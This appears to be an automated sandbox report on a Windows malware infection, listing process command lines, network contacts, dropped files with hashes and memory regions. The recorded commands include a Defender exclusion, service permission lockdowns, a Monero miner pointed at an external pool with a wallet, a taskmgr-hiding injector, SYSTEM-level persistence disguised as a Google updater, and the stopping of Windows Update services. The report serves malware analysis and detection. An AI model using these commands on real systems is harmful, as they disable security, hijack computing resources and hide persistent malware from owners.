cmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o stratum+ssl://rx.unmineable.com:443 -u XMR:479zMaydapGMnV67s9w67R7MygH86ebCQiYFDtnpdfSwGyYbWnhGerbJCbk2i2WwZx9qCrpYQmzFTBsSsQddJRLpKhMj2AL.RIG_CPU -p Max1957 --algo rx/0 --cpu-max-threads-hint=50

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\AppData\Local\NextSink\tcihw\TypeId.exe

C:\Users\Admin\AppData\Local\NextSink\tcihw\TypeId.exe

C:\Users\Admin\AppData\Local\NextSink\tcihw\TypeId.exe

C:\Users\Admin\AppData\Local\NextSink\tcihw\TypeId.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 126.21.238.8.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 198.1.85.104.in-addr.arpa udp
RU 5.42.92.51:19057 tcp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
RU 5.42.92.190:80 5.42.92.190 tcp
US 194.49.94.72:80 tcp
US 8.8.8.8:53 190.92.42.5.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 126.178.238.8.in-addr.arpa udp
RU 5.42.92.51:19057 tcp
RU 5.42.92.190:80 5.42.92.190 tcp
NL 194.169.175.118:80 194.169.175.118 tcp
RU 5.42.65.80:80 5.42.65.80 tcp
US 8.8.8.8:53 118.175.169.194.in-addr.arpa udp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
US 8.8.8.8:53 142.9.123.176.in-addr.arpa udp
US 194.49.94.11:80 tcp
MD 176.123.9.142:37637 tcp
RU 5.42.92.190:80 5.42.92.190 tcp
IT 185.196.9.161:80 185.196.9.161 tcp
US 8.8.8.8:53 161.9.196.185.in-addr.arpa udp
RU 5.42.92.190:80 5.42.92.190 tcp
RU 185.174.136.219:443 tcp
RU 5.42.92.51:19057 tcp
IE 52.111.236.23:443 tcp
US 194.49.94.11:80 tcp
RU 5.42.92.190:80 5.42.92.190 tcp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
RU 5.42.64.16:443 tcp
US 194.49.94.11:80 tcp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
RU 5.42.92.190:80 5.42.92.190 tcp
US 95.214.26.28:80 host-host-file8.com tcp
RU 5.42.64.16:443 tcp
RU 5.42.92.51:19057 tcp
US 8.8.8.8:53 bluepablo.fun udp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 8.8.8.8:53 41.18.21.104.in-addr.arpa udp
RU 5.42.92.51:19057 tcp
US 104.21.18.41:80 bluepablo.fun tcp
BG 91.92.247.247:39001 tcp
DE 144.76.136.153:443 tcp

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Pd6hs45.exe

MD5 63cd7e0102b49d21e24a2a73726376a9
SHA1 5eee503f895b015c40c8e0526ed769fb43fabe34
SHA256 9be0f395ebadabf1dfdd8aed19ea1fb73d828006bf646ce29a372e14327d2606
SHA512 cf465310be769424d496b4a48e63c3f6cfb72f1b1cc4db3aee0e6d43237c4134f6d8420d802b5759b55cc2a6ef6fb020a1183d741646d4cce7b09ce21a5b58d3

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Pd6hs45.exe

MD5 63cd7e0102b49d21e24a2a73726376a9
SHA1 5eee503f895b015c40c8e0526ed769fb43fabe34
SHA256 9be0f395ebadabf1dfdd8aed19ea1fb73d828006bf646ce29a372e14327d2606
SHA512 cf465310be769424d496b4a48e63c3f6cfb72f1b1cc4db3aee0e6d43237c4134f6d8420d802b5759b55cc2a6ef6fb020a1183d741646d4cce7b09ce21a5b58d3

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\tB0jz14.exe

MD5 f207bc0205b365ccb8c7c89d91a230b6
SHA1 1a2cb9ca422aa610f860d96092ca0c2585acdddd
SHA256 b350d0c394bed6a2bc70e3d1d6b2da9a41b1c4d38f7166cfa7c90fcbb69e81e0
SHA512 71d5da002262bae3b5152e46f106f75f5819243a2ba9bdd34d2ba9f14e6b39cdaefd282e73b4d332ea58d3dbb1efea27728f191354d75c83376864b0f188c1b8

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\tB0jz14.exe

MD5 f207bc0205b365ccb8c7c89d91a230b6
SHA1 1a2cb9ca422aa610f860d96092ca0c2585acdddd
SHA256 b350d0c394bed6a2bc70e3d1d6b2da9a41b1c4d38f7166cfa7c90fcbb69e81e0
SHA512 71d5da002262bae3b5152e46f106f75f5819243a2ba9bdd34d2ba9f14e6b39cdaefd282e73b4d332ea58d3dbb1efea27728f191354d75c83376864b0f188c1b8

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1QI06ok4.exe

MD5 784667bb96ccb30c4cf44f2c5f493769
SHA1 28185165ab4dbbb4a139ae1af0bb6934ebe05c04
SHA256 1025fb084bca865df30e69eea7a9a4a3c852626e148b340de661e6f5b63bc1c9
SHA512 62c9def097f132cdb26b11e586f3e15407b9eb9e9e32f79460a3be1bd4c8e046db8488f754cd1c1cc4fe4025a3f9bc9484e94eae0c7d273050f8e6548d12bc20

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1QI06ok4.exe

MD5 784667bb96ccb30c4cf44f2c5f493769
SHA1 28185165ab4dbbb4a139ae1af0bb6934ebe05c04
SHA256 1025fb084bca865df30e69eea7a9a4a3c852626e148b340de661e6f5b63bc1c9
SHA512 62c9def097f132cdb26b11e586f3e15407b9eb9e9e32f79460a3be1bd4c8e046db8488f754cd1c1cc4fe4025a3f9bc9484e94eae0c7d273050f8e6548d12bc20

memory/3436-21-0x0000000000400000-0x0000000000433000-memory.dmp

memory/3436-22-0x0000000000400000-0x0000000000433000-memory.dmp

memory/3436-23-0x0000000000400000-0x0000000000433000-memory.dmp

memory/3436-25-0x0000000000400000-0x0000000000433000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2pe5289.exe

MD5 b938034561ab089d7047093d46deea8f
SHA1 d778c32cc46be09b107fa47cf3505ba5b748853d
SHA256 260784b1afd8b819cb6ccb91f01090942375e527abdc060dd835992d88c04161
SHA512 4909585c112fba3575e07428679fd7add07453e11169f33922faca2012d8e8fa6dfb763d991c68d3b4bbc6e78b6f37d2380c502daada325d73c7fff6c647769b

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2pe5289.exe

MD5 b938034561ab089d7047093d46deea8f
SHA1 d778c32cc46be09b107fa47cf3505ba5b748853d
SHA256 260784b1afd8b819cb6ccb91f01090942375e527abdc060dd835992d88c04161
SHA512 4909585c112fba3575e07428679fd7add07453e11169f33922faca2012d8e8fa6dfb763d991c68d3b4bbc6e78b6f37d2380c502daada325d73c7fff6c647769b

memory/4800-29-0x0000000000400000-0x000000000040B000-memory.dmp

memory/3184-30-0x0000000001FE0000-0x0000000001FF6000-memory.dmp

memory/4800-31-0x0000000000400000-0x000000000040B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Qo3Av6.exe

MD5 14d9834611ad581afcfea061652ff6cb
SHA1 802f964d0be7858eb2f1e7c6fcda03501fd1b71c
SHA256 e6e9b3d830f2d7860a09d596576e8ab0131c527b47dda73fe727b71b44c8cf60
SHA512 cbef1f44eb76d719c60d857a567a3fc700d62751111337cd4f8d30deae6901dc361320f28dac5ec5468420419eed66cada20f4c90fe07db6a3f8cf959eba31b5

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Qo3Av6.exe

MD5 14d9834611ad581afcfea061652ff6cb
SHA1 802f964d0be7858eb2f1e7c6fcda03501fd1b71c
SHA256 e6e9b3d830f2d7860a09d596576e8ab0131c527b47dda73fe727b71b44c8cf60
SHA512 cbef1f44eb76d719c60d857a567a3fc700d62751111337cd4f8d30deae6901dc361320f28dac5ec5468420419eed66cada20f4c90fe07db6a3f8cf959eba31b5

memory/1800-37-0x0000000000400000-0x000000000043C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7iA7Fq05.exe

MD5 a509f4a2e229e42815fc905328e28c3b
SHA1 4d509e467a27fb3164beeefe80a52d9c0b0793c2
SHA256 051cf969899b38e6942ca21fe35b8c59ec6da72583317a5ad34794dcc85da7ca
SHA512 bd3f769fef03d124cd28aaf1a3d176d3708da7578bca8d62438a92582c8bd355668c963b945cbf393417eca6dce633de4185aef66b21e6b31d74e93c3177fbd2

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7iA7Fq05.exe

MD5 a509f4a2e229e42815fc905328e28c3b
SHA1 4d509e467a27fb3164beeefe80a52d9c0b0793c2
SHA256 051cf969899b38e6942ca21fe35b8c59ec6da72583317a5ad34794dcc85da7ca
SHA512 bd3f769fef03d124cd28aaf1a3d176d3708da7578bca8d62438a92582c8bd355668c963b945cbf393417eca6dce633de4185aef66b21e6b31d74e93c3177fbd2

memory/1800-43-0x0000000073D70000-0x0000000074520000-memory.dmp

memory/1800-45-0x0000000007C20000-0x00000000081C4000-memory.dmp

memory/1800-47-0x0000000007710000-0x00000000077A2000-memory.dmp

memory/1800-48-0x00000000078C0000-0x00000000078D0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is64.bat

MD5 225edee1d46e0a80610db26b275d72fb
SHA1 ce206abf11aaf19278b72f5021cc64b1b427b7e8
SHA256 e1befb57d724c9dc760cf42d7e0609212b22faeb2dc0c3ffe2fbd7134ff69559
SHA512 4f01a2a248a1322cb690b7395b818d2780e46f4884e59f1ab96125d642b6358eea97c7fad6023ef17209b218daa9c88d15ea2b92f124ecb8434c0c7b4a710504

C:\Users\Admin\AppData\Local\Temp\is64.txt

MD5 a5ea0ad9260b1550a14cc58d2c39b03d
SHA1 f0aedf295071ed34ab8c6a7692223d22b6a19841
SHA256 f1b2f662800122bed0ff255693df89c4487fbdcf453d3524a42d4ec20c3d9c04
SHA512 7c735c613ece191801114785c1ee26a0485cbf1e8ee2c3b85ba1ad290ef75eec9fede5e1a5dc26d504701f3542e6b6457818f4c1d62448d0db40d5f35c357d74

memory/1800-54-0x00000000076F0000-0x00000000076FA000-memory.dmp

memory/1800-55-0x00000000087F0000-0x0000000008E08000-memory.dmp

memory/1800-57-0x0000000007960000-0x0000000007972000-memory.dmp

memory/1800-56-0x0000000007AB0000-0x0000000007BBA000-memory.dmp

memory/1800-58-0x00000000079C0000-0x00000000079FC000-memory.dmp

memory/1800-59-0x0000000007A00000-0x0000000007A4C000-memory.dmp

memory/3184-60-0x0000000002730000-0x0000000002740000-memory.dmp

memory/3184-62-0x0000000002730000-0x0000000002740000-memory.dmp

memory/3184-69-0x0000000002730000-0x0000000002740000-memory.dmp

memory/3184-70-0x0000000002750000-0x0000000002760000-memory.dmp

memory/3184-68-0x0000000002730000-0x0000000002740000-memory.dmp

memory/3184-71-0x0000000002730000-0x0000000002740000-memory.dmp

memory/3184-67-0x0000000002730000-0x0000000002740000-memory.dmp

memory/3184-66-0x0000000002730000-0x0000000002740000-memory.dmp

memory/1800-74-0x0000000073D70000-0x0000000074520000-memory.dmp

memory/3184-73-0x0000000002730000-0x0000000002740000-memory.dmp

memory/3184-76-0x0000000002730000-0x0000000002740000-memory.dmp

memory/3184-72-0x0000000002730000-0x0000000002740000-memory.dmp

memory/3184-78-0x0000000002730000-0x0000000002740000-memory.dmp

memory/3184-80-0x0000000002730000-0x0000000002740000-memory.dmp

memory/3184-79-0x0000000002730000-0x0000000002740000-memory.dmp

memory/3184-82-0x0000000002750000-0x0000000002760000-memory.dmp

memory/3184-81-0x0000000002730000-0x0000000002740000-memory.dmp

memory/1800-77-0x00000000078C0000-0x00000000078D0000-memory.dmp

memory/3184-83-0x0000000002730000-0x0000000002740000-memory.dmp

memory/3184-85-0x0000000002730000-0x0000000002740000-memory.dmp

memory/3184-65-0x0000000002730000-0x0000000002740000-memory.dmp

memory/3184-89-0x0000000002730000-0x0000000002740000-memory.dmp

memory/3184-88-0x0000000002730000-0x0000000002740000-memory.dmp

memory/3184-87-0x0000000002730000-0x0000000002740000-memory.dmp

memory/3184-86-0x0000000002730000-0x0000000002740000-memory.dmp

memory/3184-64-0x0000000002730000-0x0000000002740000-memory.dmp

memory/3184-63-0x0000000002720000-0x0000000002730000-memory.dmp

memory/3184-90-0x0000000002720000-0x0000000002730000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4C94.exe

MD5 f6079a0d6e9c3d6c80af8adb5033b007
SHA1 c111e23c945fc86bf81729112ba1c0acdab479a0
SHA256 fed9fe7c0027acbfeb05ae652b70d981ed3aabb54559eb6bfb1ba24a27e1c3a7
SHA512 02f4609bad9babbd141e2e80e923a99b6e03969fbbf53ad1f99f1839da83076c41dd8765df081587bba466437ff64f292c672616addcae524e1e4909bc7c44bf

C:\Users\Admin\AppData\Local\Temp\4C94.exe

MD5 f6079a0d6e9c3d6c80af8adb5033b007
SHA1 c111e23c945fc86bf81729112ba1c0acdab479a0
SHA256 fed9fe7c0027acbfeb05ae652b70d981ed3aabb54559eb6bfb1ba24a27e1c3a7
SHA512 02f4609bad9babbd141e2e80e923a99b6e03969fbbf53ad1f99f1839da83076c41dd8765df081587bba466437ff64f292c672616addcae524e1e4909bc7c44bf

C:\Users\Admin\AppData\Local\Temp\4DFD.exe

MD5 0592c6d7674c77b053080c5b6e79fdcb
SHA1 693339ede19093e2b4593fda93be0b140be69141
SHA256 fe19cdb149ecd8fd116f048852dcc10e46a3521351102685ce25c61a7d962a14
SHA512 37f2ff110b0702229b888280c8c2dff7885e6b1e583ccc47c36e74f44adfa491f70d6d6ab95d79149437d6fd9400448f1046eee3676ea98dffe99bc28e4783cb

C:\Users\Admin\AppData\Local\Temp\4DFD.exe

MD5 0592c6d7674c77b053080c5b6e79fdcb
SHA1 693339ede19093e2b4593fda93be0b140be69141
SHA256 fe19cdb149ecd8fd116f048852dcc10e46a3521351102685ce25c61a7d962a14
SHA512 37f2ff110b0702229b888280c8c2dff7885e6b1e583ccc47c36e74f44adfa491f70d6d6ab95d79149437d6fd9400448f1046eee3676ea98dffe99bc28e4783cb

memory/4780-99-0x0000000000540000-0x000000000059A000-memory.dmp

memory/3512-100-0x00000000004D0000-0x00000000004EE000-memory.dmp

memory/4780-105-0x0000000000400000-0x000000000046F000-memory.dmp

memory/3512-103-0x0000000073D70000-0x0000000074520000-memory.dmp

memory/4780-106-0x0000000073D70000-0x0000000074520000-memory.dmp

memory/4780-107-0x0000000007640000-0x0000000007650000-memory.dmp

memory/3512-108-0x0000000004E80000-0x0000000004E90000-memory.dmp

memory/4780-109-0x0000000008100000-0x0000000008166000-memory.dmp

memory/4780-110-0x0000000008A00000-0x0000000008A76000-memory.dmp

memory/4780-111-0x0000000008AE0000-0x0000000008AFE000-memory.dmp

memory/4780-112-0x0000000008B90000-0x0000000008D52000-memory.dmp

memory/4780-113-0x0000000008D70000-0x000000000929C000-memory.dmp

memory/4780-114-0x0000000004510000-0x0000000004560000-memory.dmp

memory/4780-117-0x0000000073D70000-0x0000000074520000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6697.exe

MD5 8ee1f5e881840808946acf09bbc51f0f
SHA1 d127aaf7740adc4d0b6d37ced23b010f5be52cf2
SHA256 9de93be1d9882aaf80126934531965104436a42a11b96f12cb7d0a49f219d94f
SHA512 a2f18d6e848e73aa8cc3d8120bfb28704082dd9da9de16f4107282edd4c31c85cec649631dc6533be336576ed04f270760200f303a4641ba28a1ed1391e4f032

C:\Users\Admin\AppData\Local\Temp\6697.exe

MD5 502139b2b8daa082ff8d9dfabcf5706c
SHA1 06589361c3df8f840582c1774fe44ca70b6458e1
SHA256 bd89e4e9c035ab9c2aaef40f336383057162dd9444f43f106553cb573f540496
SHA512 54982c64437d8a9b677aa6e78d08a4cba82b3cc7e1959dc5c100249c4fc71748b691c9c7a3497eb7b27a06a1c15bede4101156da335b6f85daf00035a400cfb5

memory/2360-122-0x0000000073D70000-0x0000000074520000-memory.dmp

memory/2360-123-0x0000000000820000-0x00000000014BA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe

MD5 bc3354a4cd405a2f2f98e8b343a7d08d
SHA1 4880d2a987354a3163461fddd2422e905976c5b2
SHA256 fffc160a4c555057143383fec606841cd2c319f79f52596e0d27322a677dca0b
SHA512 fe349af0497e2aa6933b1acfea9fecd2c1f16da009a06ac7d7f638353283da3ef04e9c3520d33bae6e15ea6190420a27be97f46e5553a538b661af226c241c6b

C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe

MD5 bc3354a4cd405a2f2f98e8b343a7d08d
SHA1 4880d2a987354a3163461fddd2422e905976c5b2
SHA256 fffc160a4c555057143383fec606841cd2c319f79f52596e0d27322a677dca0b
SHA512 fe349af0497e2aa6933b1acfea9fecd2c1f16da009a06ac7d7f638353283da3ef04e9c3520d33bae6e15ea6190420a27be97f46e5553a538b661af226c241c6b

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 dcbd05276d11111f2dd2a7edf52e3386
SHA1 f5dc6d418d9fb2d2cfa4af440ec4ff78da8f11ec
SHA256 cea5245bab036b03f89d549c71f47df8a14854b0de515643bf95319ec5af71d4
SHA512 5f1a9c993cd5394e23b39c43cc7479355c922d1ee8ea48109bbad805209dee697e20759257eca9e2f1b75d34a8c4b4c428a736fa8a468dc18de6c44cb6394846

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 dcbd05276d11111f2dd2a7edf52e3386
SHA1 f5dc6d418d9fb2d2cfa4af440ec4ff78da8f11ec
SHA256 cea5245bab036b03f89d549c71f47df8a14854b0de515643bf95319ec5af71d4
SHA512 5f1a9c993cd5394e23b39c43cc7479355c922d1ee8ea48109bbad805209dee697e20759257eca9e2f1b75d34a8c4b4c428a736fa8a468dc18de6c44cb6394846

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 dcbd05276d11111f2dd2a7edf52e3386
SHA1 f5dc6d418d9fb2d2cfa4af440ec4ff78da8f11ec
SHA256 cea5245bab036b03f89d549c71f47df8a14854b0de515643bf95319ec5af71d4
SHA512 5f1a9c993cd5394e23b39c43cc7479355c922d1ee8ea48109bbad805209dee697e20759257eca9e2f1b75d34a8c4b4c428a736fa8a468dc18de6c44cb6394846

C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe

MD5 bc3354a4cd405a2f2f98e8b343a7d08d
SHA1 4880d2a987354a3163461fddd2422e905976c5b2
SHA256 fffc160a4c555057143383fec606841cd2c319f79f52596e0d27322a677dca0b
SHA512 fe349af0497e2aa6933b1acfea9fecd2c1f16da009a06ac7d7f638353283da3ef04e9c3520d33bae6e15ea6190420a27be97f46e5553a538b661af226c241c6b

memory/4752-155-0x00000229B41C0000-0x00000229B42AE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6ABE.exe

MD5 d497d6f5d3b74379d1ca2e1abde20281
SHA1 937aac5cf9191e833724edda2742ed115a5237c7
SHA256 a1765648a41eea21fd942776cba9b50705673d8f7564ae7f8c9751eda9e2e564
SHA512 bdb28622542e3b34e40b37a189a967b6136963200fec616c6147fd36bb543b94a7d64128d5fbd65a5358b1131dc265c7cbdb1240fece3e8c09652b97c4c025a6

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 c067b4583e122ce237ff22e9c2462f87
SHA1 8a4545391b205291f0c0ee90c504dc458732f4ed
SHA256 a16dbcd03a7549fbaf7cad1bedd01dcb961a5d43c873f1d1a50892618a06662e
SHA512 0767cba9f10154b4e28cf6a55b6fc827a96c4fbc88e2d67acd645a0a7a604a3beb63ea58d7febcf8b17de1ea3d2097e76ceac1b36b9fecf9a0945a31a9e211c3

C:\Users\Admin\AppData\Local\Temp\Broom.exe

MD5 00e93456aa5bcf9f60f84b0c0760a212
SHA1 6096890893116e75bd46fea0b8c3921ceb33f57d
SHA256 ff3025f9cf19323c5972d14f00f01296d6d7a71547eca7e4016bfd0e1f27b504
SHA512 abd2be819c7d93bd6097155cf84eaf803e3133a7e0ca71f9d9cbc3c65e4e4a26415d2523a36adafdd19b0751e25ea1a99b8d060cad61cdfd1f79adf9cd4b4eca

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

memory/4752-171-0x00000229B5EA0000-0x00000229B5EB0000-memory.dmp

memory/4752-168-0x00007FFAD0010000-0x00007FFAD0AD1000-memory.dmp

memory/2360-173-0x0000000073D70000-0x0000000074520000-memory.dmp

memory/2776-172-0x0000000002900000-0x0000000002901000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 c067b4583e122ce237ff22e9c2462f87
SHA1 8a4545391b205291f0c0ee90c504dc458732f4ed
SHA256 a16dbcd03a7549fbaf7cad1bedd01dcb961a5d43c873f1d1a50892618a06662e
SHA512 0767cba9f10154b4e28cf6a55b6fc827a96c4fbc88e2d67acd645a0a7a604a3beb63ea58d7febcf8b17de1ea3d2097e76ceac1b36b9fecf9a0945a31a9e211c3

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 c067b4583e122ce237ff22e9c2462f87
SHA1 8a4545391b205291f0c0ee90c504dc458732f4ed
SHA256 a16dbcd03a7549fbaf7cad1bedd01dcb961a5d43c873f1d1a50892618a06662e
SHA512 0767cba9f10154b4e28cf6a55b6fc827a96c4fbc88e2d67acd645a0a7a604a3beb63ea58d7febcf8b17de1ea3d2097e76ceac1b36b9fecf9a0945a31a9e211c3

C:\Users\Admin\AppData\Local\Temp\6ABE.exe

MD5 d497d6f5d3b74379d1ca2e1abde20281
SHA1 937aac5cf9191e833724edda2742ed115a5237c7
SHA256 a1765648a41eea21fd942776cba9b50705673d8f7564ae7f8c9751eda9e2e564
SHA512 bdb28622542e3b34e40b37a189a967b6136963200fec616c6147fd36bb543b94a7d64128d5fbd65a5358b1131dc265c7cbdb1240fece3e8c09652b97c4c025a6

memory/3512-177-0x0000000073D70000-0x0000000074520000-memory.dmp

memory/4752-178-0x00000229CE7A0000-0x00000229CE880000-memory.dmp

memory/4752-180-0x00000229CE880000-0x00000229CE960000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6FEF.exe

MD5 73ae6c3b85c619aa3fb06de545597251
SHA1 eb1aebe3b76ca3a2b5075880a307c7da2a7d4526
SHA256 622b9f4f5d1eb80a8d6c0384d4c2cc62db85499005cbc5efb35e0fd343db7427
SHA512 912a6aac98a5e83d9519b9bb40efebe843d5265768a702c5523161ba2edd422d7c7d743eaac8c5ddab6719f2500a9826979baab2ed22d0bd7d6be66f56d59923

memory/1484-187-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 dcbd05276d11111f2dd2a7edf52e3386
SHA1 f5dc6d418d9fb2d2cfa4af440ec4ff78da8f11ec
SHA256 cea5245bab036b03f89d549c71f47df8a14854b0de515643bf95319ec5af71d4
SHA512 5f1a9c993cd5394e23b39c43cc7479355c922d1ee8ea48109bbad805209dee697e20759257eca9e2f1b75d34a8c4b4c428a736fa8a468dc18de6c44cb6394846

memory/468-191-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/4752-192-0x00000229CEB30000-0x00000229CEBF8000-memory.dmp

memory/2776-193-0x0000000000400000-0x0000000000965000-memory.dmp

memory/3732-189-0x000002A1DC410000-0x000002A1DC510000-memory.dmp

memory/2400-194-0x00007FF70ADF0000-0x00007FF70B391000-memory.dmp

memory/1484-196-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3512-197-0x0000000004E80000-0x0000000004E90000-memory.dmp

memory/4752-195-0x00000229B5F70000-0x00000229B5FBC000-memory.dmp

memory/4752-188-0x00000229CE960000-0x00000229CEA28000-memory.dmp

memory/468-186-0x0000000002BC0000-0x0000000002FBB000-memory.dmp

memory/1184-184-0x0000000000850000-0x0000000000859000-memory.dmp

memory/468-198-0x0000000002FC0000-0x00000000038AB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6FEF.exe

MD5 73ae6c3b85c619aa3fb06de545597251
SHA1 eb1aebe3b76ca3a2b5075880a307c7da2a7d4526
SHA256 622b9f4f5d1eb80a8d6c0384d4c2cc62db85499005cbc5efb35e0fd343db7427
SHA512 912a6aac98a5e83d9519b9bb40efebe843d5265768a702c5523161ba2edd422d7c7d743eaac8c5ddab6719f2500a9826979baab2ed22d0bd7d6be66f56d59923

memory/3732-185-0x000002A1C1F00000-0x000002A1C1FA2000-memory.dmp

memory/1184-181-0x00000000008D0000-0x00000000009D0000-memory.dmp

memory/3732-200-0x000002A1DC530000-0x000002A1DC540000-memory.dmp

memory/3732-199-0x00007FFAD0010000-0x00007FFAD0AD1000-memory.dmp

memory/3556-203-0x0000000000400000-0x00000000004AA000-memory.dmp

